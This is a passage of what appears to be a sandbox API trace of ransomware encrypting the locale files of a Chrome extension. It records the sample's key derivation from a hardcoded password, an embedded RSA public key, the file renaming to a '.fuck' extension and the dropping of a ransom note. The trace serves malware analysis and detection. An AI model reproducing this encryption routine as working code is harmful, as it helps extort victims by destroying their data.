pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.892] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11018) returned 1 [0254.893] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11018, dwCertEncodingType=0x1, pInfo=0x29910b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29910e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29910e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18b28) returned 1 [0254.893] CryptEncrypt (in: hKey=0x2e18b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.893] CryptEncrypt (in: hKey=0x2e18b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10798*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10798*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.893] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e10798*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10798*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.894] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x299, lpOverlapped=0x0) returned 1 [0254.912] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x299, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0254.912] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0254.939] CloseHandle (hObject=0x5d5c) returned 1 [0254.939] CloseHandle (hObject=0x5d60) returned 1 [0254.939] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), bFailIfExists=0) returned 1 [0254.943] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json", dwFileAttributes=0x0) returned 1 [0254.943] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.gsg")) returned 1 [0254.945] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.fuck")) returned 1 [0254.946] CryptDestroyHash (hHash=0x2e18128) returned 1 [0254.946] CryptDestroyKey (hKey=0x2e186a8) returned 1 [0254.946] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.946] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.946] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0254.946] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\readme_back_files.htm")) returned 0xffffffff [0254.947] AreFileApisANSI () returned 1 [0254.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.947] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.949] GetFileType (hFile=0x5d50) returned 0x1 [0254.949] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.950] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.950] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.951] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.951] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.952] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.952] GetLastError () returned 0x0 [0254.952] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json")) returned 0x20 [0254.952] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0254.953] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.954] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.955] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.956] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.958] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.958] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.958] CryptHashData (hHash=0x2e18128, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.959] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0254.959] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.959] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.959] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e110a0) returned 1 [0254.960] CryptImportPublicKeyInfo (in: hCryptProv=0x2e110a0, dwCertEncodingType=0x1, pInfo=0x2991180*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29911b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29911b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18ce8) returned 1 [0254.960] CryptEncrypt (in: hKey=0x2e18ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.960] CryptEncrypt (in: hKey=0x2e18ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10c60*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10c60*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.960] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e10c60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10c60*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.961] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xbb, lpOverlapped=0x0) returned 1 [0254.963] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xbb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0254.964] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0254.964] CloseHandle (hObject=0x5d60) returned 1 [0254.964] CloseHandle (hObject=0x5d5c) returned 1 [0254.964] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0254.968] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0254.970] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.gsg")) returned 1 [0254.971] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.fuck")) returned 1 [0254.973] CryptDestroyHash (hHash=0x2e18128) returned 1 [0254.973] CryptDestroyKey (hKey=0x2e18828) returned 1 [0254.973] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.973] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.973] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.973] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0254.973] AreFileApisANSI () returned 1 [0254.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.973] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.974] GetFileType (hFile=0x5d50) returned 0x1 [0254.974] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.976] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.976] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.976] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.976] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.976] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.976] GetLastError () returned 0x0 [0254.976] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json")) returned 0x20 [0254.977] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json", dwFileAttributes=0x80) returned 1 [0254.977] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.978] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.980] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.981] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.984] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.984] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.984] CryptHashData (hHash=0x2e18128, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.984] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0254.984] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.984] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.984] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10820) returned 1 [0254.984] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10820, dwCertEncodingType=0x1, pInfo=0x298ffa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298ffd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298ffd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e188e8) returned 1 [0254.984] CryptEncrypt (in: hKey=0x2e188e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.984] CryptEncrypt (in: hKey=0x2e188e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e100b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e100b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.985] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e100b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e100b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.986] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb2, lpOverlapped=0x0) returned 1 [0254.988] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0254.988] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0254.988] CloseHandle (hObject=0x5d5c) returned 1 [0254.988] CloseHandle (hObject=0x5d60) returned 1 [0254.988] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), bFailIfExists=0) returned 1 [0254.992] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json", dwFileAttributes=0x0) returned 1 [0254.993] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 